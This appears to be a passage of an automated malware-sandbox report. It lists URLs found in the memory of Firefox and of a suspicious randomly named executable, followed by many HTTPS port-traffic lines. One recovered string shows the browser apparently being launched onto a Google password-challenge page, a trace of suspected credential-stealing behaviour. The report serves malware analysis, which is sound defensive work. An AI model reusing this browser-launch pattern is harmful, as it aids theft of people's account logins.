Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: 2235d4f703.exe, 00000009.00000003.2659455173.000000000597D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2789180940.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2848449096.000002348E7F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000019.00000002.2937859220.000000ADEF1AC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000019.00000003.2834797644.00000234955CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349597F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000019.00000003.2809217950.000002349597F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000019.00000002.3045686159.000002348B76D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809785226.000002348FBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2848146968.000002348E812000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000019.00000003.2851593138.000002348DAAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B76D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000019.00000003.2846711290.000002348E825000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2929719556.000000ADEE1D8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2737298674.00000204D2F50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2747148103.0000029D516CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdTrue
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdextensions.formautof
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50215
Source: unknown Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50231
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50250
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50306 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
